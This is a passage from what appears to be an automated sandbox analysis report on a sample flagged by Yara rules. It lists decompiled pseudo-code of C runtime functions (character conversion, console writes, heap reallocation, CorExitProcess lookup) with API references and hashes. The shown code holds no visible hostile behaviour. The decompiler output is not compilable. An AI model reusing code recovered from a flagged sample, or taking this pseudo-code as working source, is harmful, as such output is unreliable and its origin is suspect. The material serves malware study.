                                        					if(_t108 >= 0) {
                                        						_t101 = _t76;
                                        					}
                                        				}
                                        				_t96 = _a32;
                                        				if(_t96 == 0) {
                                        					_t96 =  *( *_a4 + 8);
                                        					_a32 = _t96;
                                        				}
                                        				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                                        				_v12 = _t54;
                                        				if(_t54 == 0) {
                                        					L38:
                                        					E004018CC();
                                        					return _t54;
                                        				} else {
                                        					_t93 = _t54 + _t54;
                                        					_t83 = _t93 + 8;
                                        					asm("sbb eax, eax");
                                        					if((_t93 + 0x00000008 & _t54) == 0) {
                                        						_t79 = 0;
                                        						__eflags = 0;
                                        						L14:
                                        						if(_t79 == 0) {
                                        							L36:
                                        							_t103 = 0;
                                        							L37:
                                        							E004063D5(_t79);
                                        							_t54 = _t103;
                                        							goto L38;
                                        						}
                                        						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                                        						_t119 = _t56;
                                        						if(_t56 == 0) {
                                        							goto L36;
                                        						}
                                        						_t98 = _v12;
                                        						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                                        						_t103 = _t58;
                                        						if(_t103 == 0) {
                                        							goto L36;
                                        						}
                                        						if((_a12 & 0x00000400) == 0) {
                                        							_t94 = _t103 + _t103;
                                        							_t85 = _t94 + 8;
                                        							__eflags = _t94 - _t85;
                                        							asm("sbb eax, eax");
                                        							__eflags = _t85 & _t58;
                                        							if((_t85 & _t58) == 0) {
                                        								_t99 = 0;
                                        								__eflags = 0;
                                        								L30:
                                        								__eflags = _t99;
                                        								if(__eflags == 0) {
                                        									L35:
                                        									E004063D5(_t99);
                                        									goto L36;
                                        								}
                                        								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                                        								__eflags = _t60;
                                        								if(_t60 == 0) {
                                        									goto L35;
                                        								}
                                        								_push(0);
                                        								_push(0);
                                        								__eflags = _a28;
                                        								if(_a28 != 0) {
                                        									_push(_a28);
                                        									_push(_a24);
                                        								} else {
                                        									_push(0);
                                        									_push(0);
                                        								}
                                        								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                                        								__eflags = _t103;
                                        								if(_t103 != 0) {
                                        									E004063D5(_t99);
                                        									goto L37;
                                        								} else {
                                        									goto L35;
                                        								}
                                        							}
                                        							_t88 = _t94 + 8;
                                        							__eflags = _t94 - _t88;
                                        							asm("sbb eax, eax");
                                        							_t64 = _t58 & _t88;
                                        							_t85 = _t94 + 8;
                                        							__eflags = _t64 - 0x400;
                                        							if(_t64 > 0x400) {
                                        								__eflags = _t94 - _t85;
                                        								asm("sbb eax, eax");
                                        								_t99 = E00403E3D(_t85, _t64 & _t85);
                                        								_pop(_t85);
                                        								__eflags = _t99;
                                        								if(_t99 == 0) {
                                        									goto L35;
                                        								}
                                        								 *_t99 = 0xdddd;
                                        								L28:
                                        								_t99 =  &(_t99[4]);
                                        								goto L30;
                                        							}
                                        							__eflags = _t94 - _t85;
                                        							asm("sbb eax, eax");
                                        							E004018E0();
                                        							_t99 = _t105;
                                        							__eflags = _t99;
                                        							if(_t99 == 0) {
                                        								goto L35;
                                        							}
                                        							 *_t99 = 0xcccc;
                                        							goto L28;
                                        						}
                                        						_t68 = _a28;
                                        						if(_t68 == 0) {
                                        							goto L37;
                                        						}
                                        						_t123 = _t103 - _t68;
                                        						if(_t103 > _t68) {
                                        							goto L36;
                                        						}
                                        						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                                        						if(_t103 != 0) {
                                        							goto L37;
                                        						}
                                        						goto L36;
                                        					}
                                        					asm("sbb eax, eax");
                                        					_t70 = _t54 & _t93 + 0x00000008;
                                        					_t83 = _t93 + 8;
                                        					if((_t54 & _t93 + 0x00000008) > 0x400) {
                                        						__eflags = _t93 - _t83;
                                        						asm("sbb eax, eax");
                                        						_t79 = E00403E3D(_t83, _t70 & _t83);
                                        						_pop(_t83);
                                        						__eflags = _t79;
                                        						if(__eflags == 0) {
                                        							goto L36;
                                        						}
                                        						 *_t79 = 0xdddd;
                                        						L12:
                                        						_t79 =  &(_t79[4]);
                                        						goto L14;
                                        					}
                                        					asm("sbb eax, eax");
                                        					E004018E0();
                                        					_t79 = _t105;
                                        					if(_t79 == 0) {
                                        						goto L36;
                                        					}
                                        					 *_t79 = 0xcccc;
                                        					goto L12;
                                        				}
                                        			}

                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                        • __alloca_probe_16.LIBCMT ref: 00407961
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                        • __alloca_probe_16.LIBCMT ref: 00407A46
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                        • __freea.LIBCMT ref: 00407AB6
                                          • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                        • __freea.LIBCMT ref: 00407ABF
                                        • __freea.LIBCMT ref: 00407AE4
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                        • String ID:
                                        • API String ID: 3864826663-0
                                        • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                        • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                        • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                        • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 72%
                                        			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                        				signed int _v8;
                                        				signed char _v15;
                                        				char _v16;
                                        				void _v24;
                                        				short _v28;
                                        				char _v31;
                                        				void _v32;
                                        				long _v36;
                                        				intOrPtr _v40;
                                        				void* _v44;
                                        				signed int _v48;
                                        				signed char* _v52;
                                        				long _v56;
                                        				int _v60;
                                        				void* __ebx;
                                        				signed int _t78;
                                        				signed int _t80;
                                        				int _t86;
                                        				void* _t93;
                                        				long _t96;
                                        				void _t104;
                                        				void* _t111;
                                        				signed int _t115;
                                        				signed int _t118;
                                        				signed char _t123;
                                        				signed char _t128;
                                        				intOrPtr _t129;
                                        				signed int _t131;
                                        				signed char* _t133;
                                        				intOrPtr* _t136;
                                        				signed int _t138;
                                        				void* _t139;
                                        
                                        				_t78 =  *0x412014; // 0x2327c9ba
                                        				_v8 = _t78 ^ _t138;
                                        				_t80 = _a8;
                                        				_t118 = _t80 >> 6;
                                        				_t115 = (_t80 & 0x0000003f) * 0x30;
                                        				_t133 = _a12;
                                        				_v52 = _t133;
                                        				_v48 = _t118;
                                        				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                                        				_v40 = _a16 + _t133;
                                        				_t86 = GetConsoleCP();
                                        				_t136 = _a4;
                                        				_v60 = _t86;
                                        				 *_t136 = 0;
                                        				 *((intOrPtr*)(_t136 + 4)) = 0;
                                        				 *((intOrPtr*)(_t136 + 8)) = 0;
                                        				while(_t133 < _v40) {
                                        					_v28 = 0;
                                        					_v31 =  *_t133;
                                        					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                                        					_t123 =  *(_t129 + _t115 + 0x2d);
                                        					if((_t123 & 0x00000004) == 0) {
                                        						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                        							_push(1);
                                        							_push(_t133);
                                        							goto L8;
                                        						} else {
                                        							if(_t133 >= _v40) {
                                        								_t131 = _v48;
                                        								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                                        								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                                        								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                        							} else {
                                        								_t111 = E00407222( &_v28, _t133, 2);
                                        								_t139 = _t139 + 0xc;
                                        								if(_t111 != 0xffffffff) {
                                        									_t133 =  &(_t133[1]);
                                        									goto L9;
                                        								}
                                        							}
                                        						}
                                        					} else {
                                        						_t128 = _t123 & 0x000000fb;
                                        						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                                        						_push(2);
                                        						_v15 = _t128;
                                        						 *(_t129 + _t115 + 0x2d) = _t128;
                                        						_push( &_v16);
                                        						L8:
                                        						_push( &_v28);
                                        						_t93 = E00407222();
                                        						_t139 = _t139 + 0xc;
                                        						if(_t93 != 0xffffffff) {
                                        							L9:
                                        							_t133 =  &(_t133[1]);
                                        							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                        							_v56 = _t96;
                                        							if(_t96 != 0) {
                                        								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                                        									L19:
                                        									 *_t136 = GetLastError();
                                        								} else {
                                        									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                                        									if(_v36 >= _v56) {
                                        										if(_v31 != 0xa) {
                                        											goto L16;
                                        										} else {
                                        											_t104 = 0xd;
                                        											_v32 = _t104;
                                        											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                        												goto L19;
                                        											} else {
                                        												if(_v36 >= 1) {
                                        													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                                        													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                        													goto L16;
                                        												}
                                        											}
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        					goto L20;
                                        					L16:
                                        				}
                                        				L20:
                                        				E004018CC();
                                        				return _t136;
                                        			}

                                        APIs
                                        • GetConsoleCP.KERNEL32 ref: 00408265
                                        • __fassign.LIBCMT ref: 004082E0
                                        • __fassign.LIBCMT ref: 004082FB
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00408321
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00408340
                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00408379
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                        • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                        • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                        • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E00091738(void* __ebx, void* __edi, void* __eflags) {
                                        				void* __esi;
                                        				void* _t3;
                                        				intOrPtr _t6;
                                        				long _t14;
                                        				long* _t27;
                                        
                                        				E00091BC7(_t3);
                                        				if(E00093268() != 0) {
                                        					_t6 = E00092BEF(E00091493);
                                        					 *0xae000 = _t6;
                                        					__eflags = _t6 - 0xffffffff;
                                        					if(_t6 == 0xffffffff) {
                                        						goto L1;
                                        					} else {
                                        						_t27 = E000932EE(1, 0x3bc);
                                        						__eflags = _t27;
                                        						if(_t27 == 0) {
                                        							L6:
                                        							E000917AE();
                                        							__eflags = 0;
                                        							return 0;
                                        						} else {
                                        							__eflags = E00092C4B( *0xae000, _t27);
                                        							if(__eflags == 0) {
                                        								goto L6;
                                        							} else {
                                        								_push(0);
                                        								_push(_t27);
                                        								E00091685(__ebx, __edi, _t27, __eflags);
                                        								_t14 = GetCurrentThreadId();
                                        								_t27[1] = _t27[1] | 0xffffffff;
                                        								 *_t27 = _t14;
                                        								__eflags = 1;
                                        								return 1;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					L1:
                                        					E000917AE();
                                        					return 0;
                                        				}
                                        			}









                                        APIs
                                        • __init_pointers.LIBCMT ref: 00091738
                                          • Part of subcall function 00091BC7: EncodePointer.KERNEL32(00000000,?,0009173D,0009112C,000ACCC0,00000014), ref: 00091BCA
                                          • Part of subcall function 00091BC7: __initp_misc_winsig.LIBCMT ref: 00091BE5
                                          • Part of subcall function 00091BC7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00092DAE
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00092DC2
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00092DD5
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00092DE8
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00092DFB
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00092E0E
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00092E21
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00092E34
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00092E47
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00092E5A
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00092E6D
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00092E80
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00092E93
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00092EA6
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00092EB9
                                          • Part of subcall function 00091BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00092ECC
                                        • __mtinitlocks.LIBCMT ref: 0009173D
                                        • __mtterm.LIBCMT ref: 00091746
                                          • Part of subcall function 000917AE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0009174B,0009112C,000ACCC0,00000014), ref: 00093182
                                          • Part of subcall function 000917AE: _free.LIBCMT ref: 00093189
                                          • Part of subcall function 000917AE: DeleteCriticalSection.KERNEL32(000AE058,?,?,0009174B,0009112C,000ACCC0,00000014), ref: 000931AB
                                        • __calloc_crt.LIBCMT ref: 0009176B
                                        • __initptd.LIBCMT ref: 0009178D
                                        • GetCurrentThreadId.KERNEL32 ref: 00091794
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                        • String ID:
                                        • API String ID: 3567560977-0
                                        • Opcode ID: f9bb779cb84ca5b0124311b4e3fba90ebad4e03ed4bea8aa2156cc4e0c14f25c
                                        • Instruction ID: f523af66e95df6526ad77a22eabbf74b38ed8b487b10ca64d22ad3eb7b9f47ce
                                        • Opcode Fuzzy Hash: f9bb779cb84ca5b0124311b4e3fba90ebad4e03ed4bea8aa2156cc4e0c14f25c
                                        • Instruction Fuzzy Hash: 14F06D32B1C7132DFE747BB4AC076CA66E59F42730B200A2AF450C80E2FF108841A554
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0009879C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				void* _t10;
                                        				signed int _t12;
                                        				intOrPtr* _t16;
                                        				intOrPtr* _t31;
                                        				void* _t32;
                                        
                                        				_push(8);
                                        				_push(0xacf60);
                                        				_t10 = E000927F0(__ebx, __edi, __esi);
                                        				_t31 =  *((intOrPtr*)(_t32 + 8));
                                        				if(_t31 != 0) {
                                        					_t12 = E00093117(0xd);
                                        					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                                        					if( *((intOrPtr*)(_t31 + 4)) != 0) {
                                        						asm("lock xadd [ecx], eax");
                                        						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0xae5b0) {
                                        							E000932B6( *((intOrPtr*)(_t31 + 4)));
                                        						}
                                        					}
                                        					 *(_t32 - 4) = 0xfffffffe;
                                        					E00098DC1();
                                        					if( *_t31 != 0) {
                                        						E00093117(0xc);
                                        						 *(_t32 - 4) = 1;
                                        						E0009363B( *_t31);
                                        						_t16 =  *_t31;
                                        						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0xae2e8) {
                                        							E000934E1(_t16);
                                        						}
                                        						 *(_t32 - 4) = 0xfffffffe;
                                        						E00098DCD();
                                        					}
                                        					_t10 = E000932B6(_t31);
                                        				}
                                        				return E00092835(_t10);
                                        			}









                                        APIs
                                        • __lock.LIBCMT ref: 00098D38
                                          • Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
                                          • Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
                                          • Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142
                                        • _free.LIBCMT ref: 00098D5E
                                          • Part of subcall function 000932B6: HeapFree.KERNEL32(00000000,00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932CA
                                          • Part of subcall function 000932B6: GetLastError.KERNEL32(00000000,?,00091676,00000000,0009419B,000A58A9,00000000,?,000A3A68,00000000,00010000,00030000,?,000A0BB7), ref: 000932DC
                                        • __lock.LIBCMT ref: 00098D77
                                        • ___removelocaleref.LIBCMT ref: 00098D86
                                        • ___freetlocinfo.LIBCMT ref: 00098D9F
                                        • _free.LIBCMT ref: 00098DB2
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                        • String ID:
                                        • API String ID: 626533743-0
                                        • Opcode ID: 1e448fa958a5f00f155cebfdd84c875f69fa7854ada8d6ffe4d2348423fda6f9
                                        • Instruction ID: fbce04c7524830cdfee10fd8e8e1933519bdb381f3d3d7d163f2479a600d110c
                                        • Opcode Fuzzy Hash: 1e448fa958a5f00f155cebfdd84c875f69fa7854ada8d6ffe4d2348423fda6f9
                                        • Instruction Fuzzy Hash: DD019231507700EAEFB8ABA4D806799B3E05F12721F24851DF4A4663D2DF748A80FB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 27%
                                        			E00403632(void* __ecx, intOrPtr _a4) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				signed int _t10;
                                        				int _t12;
                                        				int _t18;
                                        				signed int _t20;
                                        
                                        				_t10 =  *0x412014; // 0x2327c9ba
                                        				_v8 = _t10 ^ _t20;
                                        				_v12 = _v12 & 0x00000000;
                                        				_t12 =  &_v12;
                                        				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                                        				if(_t12 != 0) {
                                        					_t12 = GetProcAddress(_v12, "CorExitProcess");
                                        					_t18 = _t12;
                                        					if(_t18 != 0) {
                                        						E0040C15C();
                                        						_t12 =  *_t18(_a4);
                                        					}
                                        				}
                                        				if(_v12 != 0) {
                                        					_t12 = FreeLibrary(_v12);
                                        				}
                                        				E004018CC();
                                        				return _t12;
                                        			}










                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                        • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                        • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                        • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                        				signed int _v8;
                                        				int _v12;
                                        				char _v16;
                                        				intOrPtr _v24;
                                        				char _v28;
                                        				void* _v40;
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed int _t34;
                                        				signed int _t40;
                                        				int _t45;
                                        				int _t52;
                                        				void* _t53;
                                        				void* _t55;
                                        				int _t57;
                                        				signed int _t63;
                                        				int _t67;
                                        				short* _t71;
                                        				signed int _t72;
                                        				short* _t73;
                                        
                                        				_t34 =  *0x412014; // 0x2327c9ba
                                        				_v8 = _t34 ^ _t72;
                                        				_push(_t53);
                                        				E00403F2B(_t53,  &_v28, __edx, _a4);
                                        				_t57 = _a24;
                                        				if(_t57 == 0) {
                                        					_t52 =  *(_v24 + 8);
                                        					_t57 = _t52;
                                        					_a24 = _t52;
                                        				}
                                        				_t67 = 0;
                                        				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                        				_v12 = _t40;
                                        				if(_t40 == 0) {
                                        					L15:
                                        					if(_v16 != 0) {
                                        						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                        					}
                                        					E004018CC();
                                        					return _t67;
                                        				}
                                        				_t55 = _t40 + _t40;
                                        				_t17 = _t55 + 8; // 0x8
                                        				asm("sbb eax, eax");
                                        				if((_t17 & _t40) == 0) {
                                        					_t71 = 0;
                                        					L11:
                                        					if(_t71 != 0) {
                                        						E00402460(_t67, _t71, _t67, _t55);
                                        						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                                        						if(_t45 != 0) {
                                        							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                                        						}
                                        					}
                                        					L14:
                                        					E004063D5(_t71);
                                        					goto L15;
                                        				}
                                        				_t20 = _t55 + 8; // 0x8
                                        				asm("sbb eax, eax");
                                        				_t47 = _t40 & _t20;
                                        				_t21 = _t55 + 8; // 0x8
                                        				_t63 = _t21;
                                        				if((_t40 & _t20) > 0x400) {
                                        					asm("sbb eax, eax");
                                        					_t71 = E00403E3D(_t63, _t47 & _t63);
                                        					if(_t71 == 0) {
                                        						goto L14;
                                        					}
                                        					 *_t71 = 0xdddd;
                                        					L9:
                                        					_t71 =  &(_t71[4]);
                                        					goto L11;
                                        				}
                                        				asm("sbb eax, eax");
                                        				E004018E0();
                                        				_t71 = _t73;
                                        				if(_t71 == 0) {
                                        					goto L14;
                                        				}
                                        				 *_t71 = 0xcccc;
                                        				goto L9;
                                        			}
























                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                        • __alloca_probe_16.LIBCMT ref: 0040633D
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                        • __freea.LIBCMT ref: 004063A9
                                          • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                        • String ID:
                                        • API String ID: 313313983-0
                                        • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                        • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                        • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                        • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E000959FE(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                        				void* _t7;
                                        				long _t8;
                                        				intOrPtr* _t9;
                                        				intOrPtr* _t12;
                                        				long _t20;
                                        				long _t31;
                                        
                                        				if(_a4 != 0) {
                                        					_t31 = _a8;
                                        					__eflags = _t31;
                                        					if(_t31 != 0) {
                                        						_push(__ebx);
                                        						while(1) {
                                        							__eflags = _t31 - 0xffffffe0;
                                        							if(_t31 > 0xffffffe0) {
                                        								break;
                                        							}
                                        							__eflags = _t31;
                                        							if(_t31 == 0) {
                                        								_t31 = _t31 + 1;
                                        								__eflags = _t31;
                                        							}
                                        							_t7 = HeapReAlloc( *0xefd1c, 0, _a4, _t31);
                                        							_t20 = _t7;
                                        							__eflags = _t20;
                                        							if(_t20 != 0) {
                                        								L17:
                                        								_t8 = _t20;
                                        							} else {
                                        								__eflags =  *0xf0a40 - _t7;
                                        								if(__eflags == 0) {
                                        									_t9 = E00094196(__eflags);
                                        									 *_t9 = E000941EF(GetLastError());
                                        									goto L17;
                                        								} else {
                                        									__eflags = E0009455B(_t7, _t31);
                                        									if(__eflags == 0) {
                                        										_t12 = E00094196(__eflags);
                                        										 *_t12 = E000941EF(GetLastError());
                                        										L12:
                                        										_t8 = 0;
                                        										__eflags = 0;
                                        									} else {
                                        										continue;
                                        									}
                                        								}
                                        							}
                                        							goto L14;
                                        						}
                                        						E0009455B(_t6, _t31);
                                        						 *((intOrPtr*)(E00094196(__eflags))) = 0xc;
                                        						goto L12;
                                        					} else {
                                        						E000932B6(_a4);
                                        						_t8 = 0;
                                        					}
                                        					L14:
                                        					return _t8;
                                        				} else {
                                        					return E0009596C(__ebx, __edx, __edi, _a8);
                                        				}
                                        			}










                                        APIs
                                        • _malloc.LIBCMT ref: 00095A0A
                                          • Part of subcall function 0009596C: __FF_MSGBANNER.LIBCMT ref: 00095983
                                          • Part of subcall function 0009596C: __NMSG_WRITE.LIBCMT ref: 0009598A
                                          • Part of subcall function 0009596C: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,0009334C,00000000,00000000,00000000,00000000,?,00093201,00000018,000ACDB0), ref: 000959AF
                                        • _free.LIBCMT ref: 00095A1D
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp
